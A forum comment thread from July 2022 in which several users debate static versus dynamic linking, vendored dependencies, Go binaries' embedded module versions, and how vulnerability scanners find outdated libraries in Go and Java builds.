> It's the reason most Linux distributions came to deeply dislike bundling libraries

Is it, though? Seems like it would be trivial for a distribution maintainer to write a script to go through the dependency trees of every package, and then automatically rebuild any that depend on the vulnerable library. I don't think discovery is the problem.

I suspect this is really a legacy of when disk space was not so cheap; dynamic linking means smaller binaries (usually). And, even today, many distros would probably prefer their users to only download a 2MB library update from them than have to download 500MB worth of updated programs. Bandwidth is still not as cheap as we'd hope.

Edit: just realized you're probably talking about software packages vendoring in their own version of a library, not about a package statically linking with a system-provided copy of the library.

skybrian · on July 20, 2022

The situation for Go seems to have gotten a bit better with Go 1.18. Go binaries now include the versions of all the modules in them, and this can be listed with the "go version" command.

That won't help you rebuild the binary, but at least you can find them.

jewel · on July 20, 2022

That's fantastic. Since Go has gone all-in on static compiling, it'd be awesome if they made it possible to update a dependency without recompiling (or even having the source code for) the rest of the program.

In addition to making it easier to do security updates in situations like log4j, it'd also make it easy to comply with LGPL license terms.

kllrnohj · on July 20, 2022

That doesn't seem possible. The benefits of static linking are that unused methods, symbols, etc... can be stripped as well as cross-library optimizations like in-lining. There's not necessarily going to be library lines left at all, at least not in any way that looks anything like upstream. And it's also going to vary from binary to binary, depending on what exactly they used from the dependency.

What you're describing would be more akin to shared linkage just in a single blob. That seems like it'd be a worst-of-both-worlds result.

skybrian · on July 21, 2022

Instead of "update without compiling", maybe it would be better to attach an archive of the source to the binary, so you can update by compiling? Or maybe attach some suitable intermediate format?

er4hn · on July 20, 2022

Wouldn't that require the ABI, or at least the API, to be the same across versions of the affected library? That feels like it may be possible with enough tooling, but still very hard to enforce.

0xbadcafebee · on July 20, 2022

The library being patched needs to use the same ABI, yes. So you can usually only patch the same version of a library, not upgrade it.

Afaik, the ELF format allows you to replace sections in a binary. The code (or data) is packed as "Sections" and mapped to memory locations. You use a tool to unpack the ELF sections and replace them. The application accesses those sections of memory and uses whatever ABI the application and library are designed to interact with. As long as you patch a section with the same ABI that an app/library used before, nobody will notice. And the ELF ABI never changes. But of course, not every system uses ELFs.

But all this depends on the compiler/linker/etc and how they generate sections and store them in the binary (for example, is it all compiled into one blob-section, or does it store libraries as separate sections, which might be inefficient?). I somehow doubt Go does things in such a way to allow this kind of patching. They probably generate a giant blob full of random functions and record versions in a header without the ability to extricate a whole library.

shagie · on July 20, 2022

I'm not as familiar with Go... I do know that we use a dependency scan that looks at the docker images and recognizes vulnerable versions of various Java libraries.

With Go, can you look at a compiled binary in an image on the artifact repo and identify what libraries it used and if those libraries have vulnerabilities?

(and it appears that my question was answered in a sibling comment)

hedora · on July 20, 2022

Java's "statically link then scan" approach doesn't really work though. (Some sibling threads explain why.)

Even Linux distributions where rebuilding the world is easy (like Debian) insist on breaking dependencies out into shared libaries, since tracking ad hoc vendored dependencies is just too difficult.

For example, sometimes people play dynamic loading and renaming tricks to allow multiple versions of the same Java library to coexist. That can usually be detected by vulnerability scanners, but not always.

shagie · on July 20, 2022

I'm not sure what you mean by "statically link then scan" in the Java context. The fingerprint of the vulnerable class files are the same no matter where they are stored. They could be bundled together, or shoved in a fat jar, or exploded into all their classes -- but the class file always is distinct and identifiable.

hedora · on July 20, 2022

What if the project recompiled them from source with some other version of javac, and prepended "My" to each class name?